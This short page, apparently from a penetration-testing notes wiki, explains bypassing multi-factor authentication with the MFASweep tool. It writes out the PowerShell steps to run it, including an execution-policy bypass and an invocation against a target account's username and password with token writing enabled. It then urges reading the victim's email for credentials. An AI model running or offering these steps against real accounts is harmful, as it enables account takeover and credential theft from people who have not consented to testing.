Search

Bypassing MFA/2FA

  1. Embed GitHubEmbed GitHub
    1. Uses mailsniper once it finds something
  2. Embed GitHubEmbed GitHub

MFASweep steps:

sudo pwsh
pwsh -ep bypass
. .\MFASweep.ps1
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS -WriteTokens

Once you bypass, you can check emails for credentials or whatever else you can find!!